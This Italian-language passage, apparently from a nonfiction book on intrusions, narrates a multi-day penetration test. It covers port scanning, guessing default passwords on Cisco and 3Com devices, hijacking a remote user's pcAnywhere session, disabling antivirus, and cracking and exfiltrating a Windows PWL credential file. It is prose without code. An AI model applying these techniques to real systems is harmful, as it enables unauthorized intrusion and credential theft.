cifica; nel gergo informatico, vengono chiamati il numero di “sal- 
ti” (hops). Lanciarono traceroute per il server di posta e per il fi- 
rewall di protezione. Traceroute informò che il server di posta si 
trovava un salto dietro al firewall. 

Queste informazioni diedero loro l’indizio che o il server di 
posta si trovava in una Dmz, o che tutti i sistemi al di là del fi- 
rewall erano sulla stessa rete. (La Dmz è la cosiddetta zona de- 
militarizzata, una terra di nessuno elettronica situata tra due fi- 
rewall che di solito è accessibile solo dalla rete interna e da In- 
ternet. Lo scopo della Dmz è di proteggere la rete interna nel ca- 
so in cui uno dei sistemi esposti a Internet venga compromesso.) 

Sapevano che il server di posta aveva la porta 25 aperta, e lan- 
ciando traceroute seppero anche che potevano penetrare il fi- 
rewall per comunicare con il server di posta: “Vedemmo che quel 
percorso ci faceva passare attraverso il dispositivo del router e 
poi verso il salto successivo che sembrava scomparire — il che si- 
gnificava che quello era il firewall — e poi un salto oltre a quello 
vedevamo il server di posta. Così ci facemmo un'idea rudimen- 
tale su come avevano architettato la rete”. 

Louis dice che spesso cercavano di provare poche porte co- 
muni che loro sanno venire spesso lasciate aperte dai firewall ed 
elenca alcuni servizi come la porta 53 (usata dal Dns), la porta 
25 (il server di posta Smtp), la porta 21 (Ftp), la porta 23 (Telnet), 
la porta 80 (Http), le porte 139 e 445 (usate entrambe dal Net- 
BIOS su diverse versioni di Windows): 


Prima di condurre delle scansioni in profondità delle porte, voleva- 
mo essere sicuri di avere una lista efficace di obiettivi che non com- 
prendesse gli indirizzi Ip di sistemi non in uso. Nella fase iniziale, 
devi avere delle liste di obiettivi senza andartene in giro alla cieca a 
scansionare ogni indirizzo Ip. Dopo aver stilato la nostra lista, ri- 
maniamo di solito con cinque o sei sistemi finali che vogliamo esa- 
minare ulteriormente. 


In questo caso trovarono solo tre porte aperte: un server di 
posta, un web server con tutte le patch di sicurezza installate che 
apparentemente non era in uso e, sulla porta 23, il servizio Tel- 
net. Quando cercarono di entrare con Telnet sull’apparecchio, ot- 
tennero la tipica richiesta di “User Access Verification”, cioè la 
richiesta di password dei terminali Cisco. Stavano facendo un po’ 
di progressi: quantomeno avevano identificato la macchina co- 
me un apparecchio Cisco. 
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Louis sapeva per esperienza che su un router Cisco, la pass- 
word viene spesso configurata in modo piuttosto ovvio: “In que- 
sto caso provammo tre password: il nome della compagnia, la 
password vuota e Cisco, ma non riuscimmo a entrare nel router. 
Così invece di fare troppo rumore a questo punto decidemmo di 
interrompere i tentativi di accesso al dispositivo”. 

Cercarono di scansionare l'apparecchio della Cisco alla ricerca 
di poche porte comuni, ma non arrivarono da nessuna parte: 


Così, quel primo giorno passammo moltissimo tempo ad analizza- 
re la compagnia e la sua rete, e lanciammo alcune scansioni delle 
porte iniziali. Non direi che stavamo per rinunciare, perché c'erano 
ancora un bel po’ di trucchi che avremmo certamente provato con 
qualsiasi rete prima di pensare sul serio alla ritirata. 


Il computo totale dei risultati ottenuti per un intero giorno di 
lavoro non andò molto oltre l’identificazione di un solo router. 


Il secondo giorno 


Louis e Brock entrarono in ufficio il secondo giorno pronti a 
lanciare un Port Scanning più approfondito. Usando il termine 
“servizi” per riferirsi a delle porte aperte, Louis spiega: 


A questo punto pensammo che avevamo bisogno di trovare più ser- 
vizi su queste macchine. Così alzammo un po’ il volume e cercam- 
mo di trovare qualcosa che ci avrebbe veramente aiutati a entrare 
nella rete. Quello che vedevamo è che c'era sicuramente un buon fil- 
traggio del firewall. Cercavamo veramente qualcosa che fosse per- 
messo per errore e/o qualcosa che fosse configurato male. 


Quindi, usando il programma Nmap, uno strumento stan- 
dard per la scansione delle porte, eseguirono una scansione con 
il file dei servizi automatici del programma che cercava circa mil- 
leseicento porte; si ritrovarono di nuovo a mani vuote, niente di 
significativo. 

“Così decidemmo di eseguire un port scan completo e integrale, 
scansionando sia i router che i server di posta.” Integrale vuol di- 
re esaminare oltre sessantacinquemila porte. “Scansionammo ogni 
singola porta Tcp alla ricerca di tutti i servizi possibili sugli host 
che erano sulla lista dei nostri obiettivi in quel momento.” 

Questa volta trovarono qualcosa di interessante, anche se era 
strano e lasciava un po’ perplessi. 

La porta 4065 era aperta. E difficile trovare un numero di por- 
ta così alto in uso. Spiega Louis: “A quel punto pensammo che 
forse avevano configurato un servizio Telnet sulla porta 4065. Co- 
sì provammo a entrare con Telnet su quella porta per vedere se 
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riuscivamo a confermarlo”. (Telnet è un protocollo per control- 
lare remotamente una macchina su Internet. Usando Telnet, Louis 
si collegò alla porta remota, che accettò dei comandi dal suo com- 
puter e gli rispose con risultati che gli apparvero direttamente 
sullo schermo.) 

Quando cercarono di collegarsi, ottennero la richiesta di no- 
me utente e password. Avevano avuto dunque ragione a suppor- 
re che la porta fosse usata per un servizio Telnet, ma la finestra 
di dialogo per l'autenticazione dell'utente era molto diversa da 
quella offerta dal servizio Telnet della Cisco: “Dopo un po’ lo iden- 
tificammo come un apparecchio 3Com. Il che ci entusiasmò per 
quanto stavamo facendo, perché non ti capita spesso di scoprire 
una macchina della Cisco che appare come un altro apparecchio, 
o di trovare qualche altro servizio disponibile su una porta Tcp 
alta”. Ma il fatto che il servizio Telnet sulla porta 4065 stesse gi- 
rando su un apparecchio 3Com non aveva alcun senso per loro: 


Avevamo due porte aperte sullo stesso apparecchio che si identifi- 
cavano come due strumenti del tutto diversi realizzati da produtto- 
ri completamente diversi. 


Brock trovò la porta Tcp alta e vi si collegò usando Telnet. 
“Non appena gli apparve la richiesta di immissione del log-in, gli 
strillai di provare admin [come nome utente], con le solite pas- 
sword sospette, cioè password, admin e vuoto.” Provò diverse 
combinazioni delle tre come nome utente e password e trovò la 
chiave dopo pochi tentativi: il nome utente e la password del- 
l'apparecchio 3Com erano entrambi admin. “A quel punto stril- 
lò che era entrato,” disse Louis, volendo dire che ormai avevano 
un accesso Telnet al dispositivo 3Com. Il fatto che fosse un ac- 
count da amministratore era la ciliegina sulla torta: 


L'aver indovinato quella password fu il primo vero risultato che rag- 
giungemmo. 

Avevamo arpionato il tonno. In quel momento stavamo lavorando 
su due postazioni differenti. Inizialmente, quando scansionavamo 
la rete e gli elenchi di numeri lavoravamo su macchine separate e ci 
scambiavamo le informazioni. Ma una volta trovata la porta che da- 
va accesso a quella richiesta di log-in, mi spostai anch'io su quella 
stessa macchina e iniziammo a lavorare insieme. 

Fu una cosa fantastica. Era un apparecchio 3Com e avevamo un ac- 
cesso di consolle e forse avevamo davanti un’autostrada per fare in- 
dagini su quello che potevamo fare. 

La prima cosa che volevamo era scoprire esattamente cos'era l'ap- 
parecchio 3Com e perché era accessibile su una porta Tcp alta del 
router Cisco. 


Attraverso l'interfaccia a linee di comando, riuscirono a por- 
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re delle domande sullo strumento. “Pensammo che probabilmente 
qualcuno aveva inserito il cavo della consolle di questo disposi- 
tivo 3Com nell’apparecchio Cisco e ci aveva permesso inavverti- 
tamente di entrare.” Ciò avrebbe avuto senso, come una moda- 
lità comoda per i dipendenti che potevano usare Telnet nell’ap- 
parecchio 3Com attraverso il router. “Forse non c'erano monitor 
o tastiere a sufficienza nel centro dati,” immagina Louis, e ave- 
vano rabberciato un cavo come toppa temporanea. Quando non 
ce n'era stato più bisogno, l'amministratore che aveva collegato 
il cavo se ne era dimenticato. Se ne era andato, suppone Louis, 
“del tutto inconsapevole delle conseguenze delle sue azioni”. 


Esaminando la configurazione dell'apparecchio 3Com 


I due avevano ormai capito che il dispositivo 3Com si trova- 
va dietro al firewall e che l'errore dell'’amministratore forniva un 
percorso per aggirare il firewall attraverso la porta alta aperta. 

Una volta entrati nella consolle 3Com, guardarono i dati di 
configurazione, compresi gli indirizzi Ip assegnati alla macchi- 
na, e i protocolli usati per la connessione virtual private network.! 
Ma scoprirono anche che l'apparecchio si trovava all’interno del- 
lo stesso blocco di indirizzi del server di posta e al di fuori di un 
firewall interno, in una Dmz. “Arrivammo alla conclusione che 
si trovava oltre il firewall e che era protetto da Internet tramite 
delle specie di regole di Filtering.” 

Cercarono di analizzare la configurazione dell'apparecchio 
per analizzare le connessioni in entrata, ma attraverso quell’in- 
terfaccia non riuscirono a ottenere sufficienti informazioni. Ep- 
pure, ipotizzarono che quando un utente qualsiasi si collegava 
da Internet al router Cisco sulla porta 4065, la connessione ve- 
niva stabilita probabilmente con l'apparecchio 3Com che era sta- 
to collegato al router Cisco. 


Così a questo punto eravamo molto fiduciosi che saremmo riusciti 
a entrare nelle reti dall’altra parte e ad assumere un controllo mag- 
giore della rete interna. Ora, eravamo di buon umore ma, come di- 
cono gli inglesi, “piuttosto spompati”, avendoci già lavorato per due 
giorni pieni. 

Andammo al pub e discutemmo del fatto che l'indomani sarebbe sta- 
ta una bella giornata, perché avremmo veramente iniziato a guar- 
dare alcuni sistemi finali e a spingerci più a fondo nella rete. 


1 Una virtual private network, o Vpn, è una connessione sicura stabilita den- 
tro una rete insicura, di solito Internet. Il livello della sicurezza è determinato dal 
tipo di codificazione impiegato. La codificazione può essere effettuata dagli stes- 
si software dei firewall o anche dai router. Vedi anche il capitolo 8. [N.d.7.] 
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Incuriositi dall’apparecchio 3Com, avevano installato un di- 
spositivo per registrare in tempo reale gli ingressi sulla consolle. 
Se ci fosse stata una qualsiasi attività di notte, sarebbero riusci- 
ti a vederla il mattino dopo. . 


Il terzo giorno 


Quando il mattino Brock ispezionò il registro della consolle, 
scoprì diversi indirizzi Ip. Spiega Louis: 


Dopo aver osservato ancora per un po’ l'apparecchio 3Com, realiz- 
zammo che era una specie di Vpn usata da utenti remoti per colle- 
garsi alla rete aziendale da qualche parte su Internet. 

A quel punto, ci entusiasmammo per il fatto che saremmo entrati 
nello stesso modo in cui entravano gli utenti legittimi. 


Cercarono di installare la loro interfaccia Vpn personale sul- 
l'apparecchio 3Com aggiungendo un’altra interfaccia alla mac- 
china 3Com, con un indirizzo Ip differente, che non fosse filtra- 
to esplicitamente dal firewall. 

Non funzionò. Realizzarono che lo strumento non poteva es- 
sere configurato senza danneggiare i servizi legittimi. Non riu- 
scirono ad attivare un sistema Vpn configurato in modo identi- 
co, perché il modo in cui l'architettura era configurata impediva 
loro di fare quello che avrebbero voluto. 


Così questa strategia di attacco fallì rapidamente. 

Ci sentivamo un po’ giù e non più molto eccitati a questo punto. Ma 
ci trovavamo nella tipica situazione in cui hai fatto solo il primo ten- 
tativo e c'è ancora spazio per provare altre strade. Avevamo co- 
munque un buon incentivo, potevamo entrare su questo apparec- 
chio; avevamo ancora quel vantaggio. Ci buttammo nella cosa in- 
tensamente per cercare di portarla avanti. 


Erano entrati nella zona demilitarizzata della rete della com- 
pagnia, ma quando cercavano di ricollegarsi verso l'esterno ai pro- 
pri sistemi, venivano bloccati. Cercarono anche di eseguire un ping 
sweep (nel tentativo di ottenere risposte da tutti i sistemi della re- 
te) sull'intero network, a eccezione del sistema 3Com dietro al fi- 
rewall, per identificare tutti i possibili sistemi da aggiungere alla 
lista di obiettivi. Se ci fossero stati degli indirizzi di macchine nel- 
la cache, avrebbe significato che qualche dispositivo stava bloc- 
cando l’accesso al protocollo di livello più alto. “Dopo diversi ten- 
tativi,” dice Louis, “notammo dei dati nell’Arp Table, che indica- 
vano che alcune macchine avevano trasmesso i propri indirizzi.” 
(Il protocollo Arp, o Address Resolution Protocol, è un metodo per 
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trovare l'indirizzo fisico di un host dal suo indirizzo Ip. Ciascun 
host mantiene una Tabella di traduzioni di indirizzi per ridurre il 
ritardo nel forwardare i pacchetti di dati.) 

Così c'erano sicuramente altre macchine all’interno del do- 
minio, “ma quelle non rispondevano ai ping, il che è un classico 
segno della presenza di un firewall. Per coloro che non sanno co- 
s'è un ‘ping’, si tratta di una tecnica di scansione delle reti che 
comporta la trasmissione di un certo tipo di pacchetti (Icmp) al 
sistema prescelto per determinare se l'host sia ‘vivo’ e pronto a 
rispondere. Se l'host è vivo, risponderà con un pacchetto di ‘ri- 
sposta Icmp a eco’. Questo sembrò confermare la nostra im- 
pressione che c’era un altro firewall, cioè un altro livello di sicu- 
rezza tra l'apparecchio 3Com e la loro rete interna”. 

Louis iniziò a pensare che avevano imboccato una strada sen- 
za uscita: 


Eravamo entrati in questo dispositivo Vpn ma non avevamo potuto 
installare il nostro. A quel punto, l'entusiasmo cominciò a scemare. 
Iniziammo ad avere la sensazione che non ci saremmo spinti oltre 
nella rete. E così sentimmo il bisogno di fare un brainstorming per 
farci venire delle idee nuove. 


Decisero di guardare meglio tra gli indirizzi Ip che avevano 
trovato nei registri della consolle: “Considerammo che il passo 
successivo poteva consistere nel dare uno sguardo a cosa stava 
comunicando con questo apparecchio 3Com, perché se eravamo 
entrati in quel dispositivo, allora forse saremmo anche riusciti a 
impossessarci di un collegamento esistente verso la rete”. 

Conoscevano alcune delle regole di filtraggio, racconta Louis, 
e cercarono un modo per aggirare queste regole sul firewall. La 
sua speranza era che sarebbero riusciti a “trovare dei sistemi ri- 
tenuti fidati e che forse potevano avere i privilegi per passare ef- 
fettivamente attraverso questo firewall. Gli indirizzi Ip che veni- 
vano fuori erano di grande interesse per noi”. 

Mentre erano connessi alla consolle del sistema 3Com, spie- 
ga, ogni volta che un utente remoto si collegava o che veniva ef- 
fettuato un cambio di configurazione, un messaggio di allerta 
lampeggiava nella parte bassa dello schermo: “Riuscivamo a ve- 
dere le connessioni effettuate da questi indirizzi Ip”. 

I dati di registrazione specificavano l’organizzazione cui era- 
no assegnati gli indirizzi Ip. Inoltre, questi dati comprendevano 
anche le informazioni di contatto del personale tecnico e ammi- 
nistrativo responsabile dell’organizzazione della rete. Usando 
questi indirizzi, si rivolsero di nuovo ai dati del registro del da- 
tabase di Ripe, che gli dava le informazioni sulle imprese cui era- 
no assegnati gli indirizzi. 
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La ricerca consegnò loro un’altra sorpresa: “Scoprimmo che 
gli indirizzi erano stati registrati da un grande provider delle te- 
lecomunicazioni di quel paese. A questo punto non riuscivamo 
più a raccapezzarci, non potevamo veramente capire cos’erano 
questi indirizzi Ip, perché le persone si stavano collegando da una 
telecom”, dice Louis, usando il termine britannico per quello che 
noi americani chiamiamo Isp. I due cominciarono a chiedersi se 
le connessioni Vpn fossero anch'esse di utenti remoti della com- 
pagnia, o erano qualcosa di completamente differente, che al mo-- 
mento non riuscivano neanche a immaginare. 


Ci trovavamo al punto in cui bisognava sedersi e fare un autentico 
brain dump.? Avevamo veramente bisogno di fare insieme il quadro 
della situazione onde poterci capire qualcosa. 

La promessa del primo mattino non era stata soddisfatta. Avevamo 
accesso al sistema, ma non eravamo riusciti a spingerci oltre e sen- 
tivamo che non avevamo fatto alcun progresso durante il giorno. Ma 
invece di andarci a seppellire a casa, per poi tornare la mattina se- 
guente e riprendere dallo stesso punto, pensammo di andare al pub, 
bere qualcosa, rilassarci e ripulire un po’ la testa prima di prendere 
i mezzi pubblici e andare via. 

Era l’inizio della primavera e nell'aria c'era una punta di gelo. La- 
sciammo l’ufficio e andammo in una specie di pub inglese tradizio- 
nale, piuttosto tetro e fumoso, dietro l'angolo. 

To presi una lager, Brock uno schnapps alla pesca e limonata, buo- 
no, lo devi provare. Ci sedemmo e scambiammo due chiacchiere 
commiserandoci per come la giornata non era andata secondo i pia- 
ni. Dopo la prima bibita eravamo un po’ più rilassati: prendemmo 
una penna e un pezzo di carta. Iniziammo a buttare giù un po’ di 
idee su cosa avremmo fatto in seguito. 

Eravamo seriamente determinati a preparare un piano, così che il 
mattino dopo saremmo arrivati in ufficio e avremmo provato imme- 
diatamente qualcosa. Disegnammo l'architettura della rete, la map- 
pammo e cercammo di capire quali utenti potevano avere bisogno di 
un accesso Vpn, dove erano localizzati fisicamente i sistemi, e i pro- 
babili passi che gli implementatori del sistema avevano pensato nel- 
l'installare il servizio di accesso remoto per questa società. 
Disegnammo i sistemi noti e poi da quel punto cercammo di cogliere 
i particolari e dove erano localizzati alcuni degli altri sistemi. Ave- 
vamo bisogno di capire dov'era situato l'apparecchio 3Com allin- 
terno della rete. 

In fondo alla figura puoi vedere una serie di quadrati affiancati. Ipo- 
tizzammo che le guardie e gli autisti avessero bisogno di entrare in 
alcune parti del sistema. Ma non ne eravamo del tutto sicuri. 


? Un brain dump (letteralmente, “scaricare il cervello”) è, nel gergo hacker, 
l’atto di dirsi tutto su un particolare argomento. Di solito viene usato quando si 
passa a un’altra persona la gestione di un pezzo di codice. Concettualmente è ana- 
logo al “core dump” eseguito da un sistema operativo che salva molte informa- 
zioni utili prima di uscire. [N.d.T.] 
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Louis si chiese chi altri, al di là degli addetti interni, poteva 
aver bisogno di entrare in questa rete. Avevano di fronte una com- 
pagnia orgogliosa della propria innovazione tecnologica, così 
Louis e Brock pensarono che forse avevano sviluppato “un’ap- 
plicazione per la distribuzione davvero ottima”, che permetteva 
alle guardie di entrare nella rete dopo aver effettuato una conse- 
gna, per vedere quale sarebbe stata quella successiva. Questa ap- 
plicazione poteva essere stata programmata in modo da rendere 
automatico tutto il processo, cioè a prova di idiota. Forse l’auti- 
sta cliccava su un'icona che diceva all'applicazione di collegarsi 
al server delle applicazioni per ottenere i suoi ordini: 


Pensammo che gli autisti forse non erano tecnologicamente molto 
esperti e che quindi dovevano avergli installato un sistema che fos- 
se molto facile da usare. Iniziammo a riflettere dal punto di vista 
dell’azienda: che tipo di sistema sarebbe stato facile installare? Che 
tipo di sistema sarebbe stato facile da gestire e sarebbe stato al con- 
tempo sicuro? 


Pensarono a un servizio di dial-up accessibile “forse da un 
computer portatile nella cabina” [lo scompartimento dell’autista 
del furgone]. 

“E la società avrebbe dovuto o ospitare questi server in cui era- 
vamo entrati o avrebbe dovuto esternalizzarli a terzi. Ipotizzam- 
mo che i terzi fossero una compagnia di telecomunicazione e che 
le informazioni sarebbero dovute transitare da loro a noi, e che ciò 
doveva avvenire su Internet tramite un tunnel Vpn.” Immaginaro- 
no che le guardie chiamavano l’Isp, si autenticavano lì, prima che 
fosse permesso loro di collegarsi alla rete della compagnia. 

Ma c'era anche un'altra possibilità. Proseguì Louis: 


Ipotizzammo: “Vediamo se possiamo far funzionare un'architettu- 
ra dove una persona in un furgone può fare il log-in, passare oltre 
le sue credenziali per l'autenticazione ed essere autenticata diretta- 
mente dalla compagnia anziché dal provider telecom. Come potrebbe 
essere configurato il Vpn dell'azienda per far sì che qualsiasi infor- 
mazione che passa dalla guardia alla compagnia non venga trasmessa 
in chiaro su Internet?”. 


Pensarono anche al modo in cui la compagnia trattava lau- 
tenticazione degli utenti. Dedussero che se una guardia doveva 
chiamare in dial-up uno dei sistemi che si trovano nel provider 
telecom, e doveva autenticarsi su di esso, allora i servizi di au- 
tenticazione venivano semplicemente offerti in outsourcing. Pen- 
sarono che forse esisteva un’altra soluzione, per cui i server di 
autenticazione erano ospitati dalla compagnia anziché dal pro- 
vider telecom. 
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Spesso il compito dell’autenticazione viene affidato a un ser- 
ver separato che svolge questa funzione. Forse l'apparecchio 
3Com veniva usato per accedere al server di autenticazione sul- 
la rete interna della compagnia. Chiamando da un modem cel- 
lulare, la guardia si collegava all’Isp, veniva trasferita all’appa- 
recchio 3Com, e il suo nome utente e la sua password venivano 
quindi spediti all’altro server per l'autenticazione. 

Così a questo punto la loro ipotesi di lavoro era che quando 
una guardia della security si collegava in dial-up, stabiliva un col- 
legamento Vpn con il dispositivo 3Com. 

Louis e Brock immaginarono che per ottenere l’accesso alla 
rete interna, dovevano prima entrare nel sistema di telecomuni- 
cazione dell’Isp con cui si collegavano gli autisti dei furgoni. Ma 
“la cosa che non conoscevamo erano i numeri di telefono di que- 
sti apparecchi per il dial-up. Si trovavano in un paese straniero, 
e non sapevamo che tipo di linee telefoniche avessero e le possi- 
bilità di trovare queste informazioni per conto nostro erano bas- 
se. La sola cosa che conoscevamo era che il tipo di protocollo del- 
la Vpn era il Pptp”. La ragione per cui quest'informazione era ri- 
levante è che l'installazione di default della Microsoft uno “Sha- 
red Secret”, che di solito è la finestra del login e della password 
per il server o per il dominio. 

A questo punto si erano scolati diversi drink e decisero che 
per risolvere il problema dovevano usare “un approccio senza re- 
strizioni”: 


A questo punto pensammo di conservare questo pezzo di carta su 
cui avevamo scarabocchiato tutte queste cose, perché poteva es- 
sere un hack molto bello se fossimo riusciti a entrare. E tra noi c'e- 
ra quasi una sensazione di fierezza per il modo in cui pensavamo 
di farcela. 


Alcuni pensieri sul cosiddetto “intuito dell'hacker” 


L'ipotesi formulata dalla coppia quella notte si sarebbe rive- 
lata piuttosto precisa. Louis fa delle osservazioni sull’intuito che 
sembra essere una qualità di un buon hacker: 


È molto difficile spiegare cos'è che ti produce quella sensazione. Vie- 
ne solo dall’esperienza e dal saper analizzare il modo in cui i siste- 
mi sono configurati. 

Brock, in una fase molto prematura del progetto, ebbe la sensazio- 
ne che dovevamo andare avanti con questa cosa perché pensava che 
avremmo ottenuto un risultato dalla ricerca; è molto difficile da spie- 
gare. Intuito dell’hacker? 

Hai davanti questi piccoli frammenti di informazione e il modo in 
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cui le cose sono collegate, e inizi a farti un'idea dell'azienda e dei re- 
sponsabili dell’It. E avevamo questa specie di sensazione che erano 
molto preparati in materia di sicurezza, ma che forse stavano com- 
mettendo qualche piccolo errore. 


La mia opinione a riguardo è che gli hacker si fanno un'idea 
di come le reti e i sistemi sono configurati nell'ambiente azien- 
‘dale semplicemente mettendo le mani un po’ ovunque. È con le- 
sperienza che divieni consapevole del modo in cui pensano gli 
amministratori di sistema e gli sviluppatori. È come una partita 
a scacchi, in cui cerchi di battere il tuo avversario con l'intelli- 
genza e l'astuzia. 

Per questo sono convinto che ciò che è in gioco in questo con- 
testo si basi sulla conoscenza del modo in cui gli amministrato- 
ri di sistema configurano le reti e degli errori più comuni che 
commettono. Forse Louis aveva ragione all'inizio delle sue os- 
servazioni sull'argomento. Ciò che alcune persone chiamano in- 
tuito può anche essere chiamato esperienza. 


Il quarto giorno 


La mattina dopo, non appena entrati, si misero a guardare 
gli ingressi registrati dalla consolle sull’apparecchio 3Com, in at- 
tesa che si collegassero delle persone. Ogni volta che qualcuno lo 
faceva, scansionavano il più rapidamente possibile le porte del- 
l'indirizzo Ip che si stava collegando in entrata. 

Scoprirono che le connessioni duravano circa un minuto e 
poi si scollegavano. Se la loro ipotesi era giusta, la guardia si col- 
legava, prendeva il suo ordine di lavoro e poi andava di nuovo off- 
line. Il che significava che si sarebbero dovuti muovere molto ra- 
pidamente. “Quando vedevamo questi indirizzi Ip lampeggiare 
spremevamo veramente il client,” commenta Louis, usando il ter- 
mine “spremere” nel senso di battere i tasti con l'adrenalina che 
scorreva, come se fossero intenti in un gioco al computer molto 
eccitante. 

Scelsero alcune porte con l’idea di trovare servizi che pote- 
vano essere vulnerabili, nella speranza di trovarne uno che po- 
tesse essere attaccato, come un server Telnet o Ftp, o un web ser- 
ver insicuro. O forse sarebbero riusciti a entrare nelle aree con- 
divise tramite il NetBIOS. Cercarono anche dei programmi ba- 
sati su interfacce grafiche per la gestione remota da desktop, co- 
me WinVnc e Pc Anywhere. 

Ma mano a mano che le ore del mattino passavano, non riu- 
scirono a vedere alcun servizio al di là di un paio di host: 
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Non stavamo andando da nessuna parte, ma eravamo lì che conti- 
nuavamo a eseguire scansioni ogni volta che un utente remoto si 
collegava. Poi si collegò una macchina. Facemmo una scansione del- 
le sue porte e trovammo una porta aperta usata di solito da Pc 
Anywhere. 


L'applicazione Pc Anywhere consente il controllo remoto di 
un computer. Ma questo è possibile solo quando anche sull’altro 
computer è aperto il programma: 


Vedendo che la scansione ci aveva rivelato quella porta, eravamo co- 
me entusiasti: “Ah, c'è Pc Anywhere su questa macchina. Potrebbe 
essere una della macchine degli utenti, proviamoci”. 

Gridammo in ufficio: “Chi ha Pc Anywhere installato!?”. 

Qualcuno rispose: “Ce lho io”. Così gli gridai il numero Ip in modo 
che potesse collegarsi il più rapidamente possibile. 


Louis definisce il momento del collegamento al sistema Pc 
Anywhere “un passaggio veramente decisivo”. Raggiunse il col- 
lega alla sua macchina, mentre una finestra si apriva sullo scher- 
mo. “All’inizio ti appare uno sfondo nero,” dice Louis, “e av- 
vengono una o due cose: o ti appare una finestra grigia per in- 
serire la password, o lo sfondo diventa blu e viene fuori un 
desktop Windows.” 


Trattenemmo il fiato nella speranza di vedere il desktop. Il tempo 
che passò in attesa della scomparsa dello schermo nero mi sembrò 
un'eternità. Continuavo a pensare: “Si sta collegando, si sta colle- 
gando, sta per scadere il tempo”. Oppure “mi sa che ci chiede la pas- 
sword”. 

Proprio all'ultimo secondo, mentre stavo pensando: “Adesso arriva 
la finestra con la password”, ci apparve il desktop Windows! Wow! 
A questo punto avevamo il desktop. Tutti gli altri nella stanza si al- 
zarono e vennero a guardare. 

La mia reazione fu: “Ecco, ci siamo di nuovo, non dobbiamo per- 
dere questa occasione, sfruttiamola”. 


Erano finalmente riusciti a entrare in un client che si colle- 
gava all'apparecchio 3Com: 


A questo punto pensammo “o la va o la spacca”. Sapevamo che le 
persone si collegavano per un tempo molto breve e che rischiavamo 
di non avere un'altra occasione. 


La prima cosa da fare era aprire la sessione di Pc Anywhere 
e premere due bottoni del software, che Louis chiama “il botto- 
ne per oscurare lo schermo” e “il bottone per escludere l’utente 
dalla consolle”. E aggiunge: 
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Quando usi Pc Anywhere, sia la persona che si trova sul desktop del- 
la macchina che quella che usa Pc Anywhere possono automatica- 
mente controllare il mouse e muoverlo sullo schermo per lanciare 
applicazioni, aprire file e via dicendo. Ma con Pc Anywhere puoi an- 
che escludere l’utente dal controllo del mouse. 


Lo fecero. Assunsero il controllo della sessione, e si assicu- 
rarono che l’utente non potesse vedere quello che stavano facen- 
do oscurandogli lo schermo. Louis sapeva che non ci sarebbe vo- 
luto molto perché utente si insospettisse o pensasse di avere un 
problema con il computer. Avrebbe quindi spento la macchina, il 
che voleva dire che avevano poco tempo a disposizione: 


Ci stavamo giocando la chance di entrare. A questo punto doveva- 
mo pensare rapidamente, su due piedi, per decidere cosa fare e qua- 
li informazioni di valore potevamo ricavare da questa macchina. 
Potevo vedere che sulla macchina girava Windows 98 della Micro- 
soft e così quello che dovevamo fare era trovare qualcuno che po- 
tesse dirci quali informazioni potevamo ottenere da un Windows 98. 
Fortunatamente, uno dei colleghi che si stava interessando un po’ 
alla cosa, anche se non stava lavorando sul nostro progetto, sapeva 
come estrarre delle informazioni da questi sistemi. 


La prima cosa che suggerì fu di dare uno sguardo al file Pwl 
contenente la lista password. (Questo file, usato da Windows 95, 
98 e Millennium Edition, contiene delle informazioni sensibili 
come le password di dial-up e le password di rete. Per esempio 
se usi un sistema di networking in dial-up sotto Windows, tutte 
le informazioni perl’autenticazione come ilnumero, ilnome uten- 
te e la password di dial-up vengono archiviate con ogni probabi- 
lità in un file Pwl.) 

Prima di scaricare il file, dovevano disattivare il software an- 
tivirus in modo che non avrebbe individuato gli strumenti che 
stavano utilizzando. Poi cercarono di usare l'opzione per il tra- 
` sferimento dei documenti di Pc Anywhere per trasferire il file Pwl 
dalla macchina dell’autista alla loro. Non funzionò. “Non erava- 
mo sicuri del perché, ma non avevamo tempo per discuterne. Do- 
vevamo ottenere le informazioni Pwl dalla macchina immedia- 
tamente, mentre l'autista era ancora online.” 

Cos'altro potevano fare? Una possibilità era di uploadare un 
software di craccaggio, craccare il file Pwl sulla macchina del- 
l'autista ed estrarre le informazioni in un file di testo, per poi spe- 
dirselo. Avevano già il nome utente e la password della macchi- 
na dell’autista. Ma realizzarono che c'era un problema: la map- 
patura della tastiera installata sulla macchina dell’autista era per 
una lingua straniera, il che spiegava anche i problemi che stava- 
no avendo con l’autenticazione: “Continuavamo a vedere questo 
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messaggio di errore di login a causa delle mappature straniere 
della tastiera”. 
Le lancette dell'orologio ticchettavano: 


Pensiamo che il nostro tempo sta per scadere. Il tipo seduto alla gui- 
da del furgone di sicurezza potrebbe trasportare un sacco di soldi, 
o forse dei prigionieri. Si sta chiedendo: “Ma che diavolo sta succe- 
dendo qui?”. 

Ho paura che stacchi la spina prima che riusciamo a mettere le ma- 
ni su quello che ci serve. 


Eccoli lì, in una situazione critica, con una pressione tempo- 
rale enorme e con nessuno dei due che ha una soluzione per ri- 
solvere il problema della tastiera straniera. Forse, come soluzio- 
ne immediata potevano inserire il nome utente e la password di- 
gitandoli in codice Ascii al posto delle lettere e dei numeri. Ma 
nessuno di loro sapeva come inserire al volo dei caratteri usan- 
do il corrispettivo codice Ascii. 

Così, cosa si fa oggi quando si ha bisogno velocemente di una 
risposta? È quello che fecero Louis e Brock: “Decidemmo di an- 
dare in Internet per fare delle ricerche e inserire delle lettere sen- 
za usare quelle della tastiera”. 

Ottennero velocemente la risposta: attivare la chiave del bloc- 
co numeri, quindi tenere premuto il tasto dell’Alt e digitare il nu- 
mero del carattere Ascii sulla tastiera. Il resto fu semplice: 


Abbiamo spesso bisogno di tradurre lettere e simboli in Ascii e vi- 
ceversa. Si trattava semplicemente di alzarsi e consultare uno di quei 
fogli di appunti utili che teniamo appesi sui muri. 


Invece di avere delle foto di pin-up, loro avevano delle tabel- 
le Ascii attaccate al muro. “Delle pin-up in Ascii,” come le de- 
scrive Louis. 

Con una rapida trascrizione delle informazioni, e uno di lo- 
ro alla tastiera mentre l’altro gli dettava cosa scrivere, riuscirono 
a inserire il nome utente e la password. Poi trasferirono lo stru- 
mento per il craccaggio del Pwl e lo lanciarono per estrarre le 
informazioni dal file Pwl in un file di testo, che trasferirono quin- 
di dal portatile dell’autista a un server Ftp controllato da loro. 

Quando Louis esaminò il file, trovò le credenziali per l'au- 
tenticazione chie stava cercando, compreso il numero di dial-up 
e le informazioni di log-in usate dall’autista per collegarsi al ser- 
vizio Vpn della compagnia. Quelle, pensò Louis, erano tutte le 
informazioni di cui aveva bisogno. 

Mentre faceva pulizie per essere sicuro che la loro visita non 
lasciasse tracce, Louis ispezionò le icone sul desktop e ne notò 
una che sembrava essere quella dell’applicazione gestita dalle 
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guardie per prendere le loro informazioni dalla compagnia. E co- 
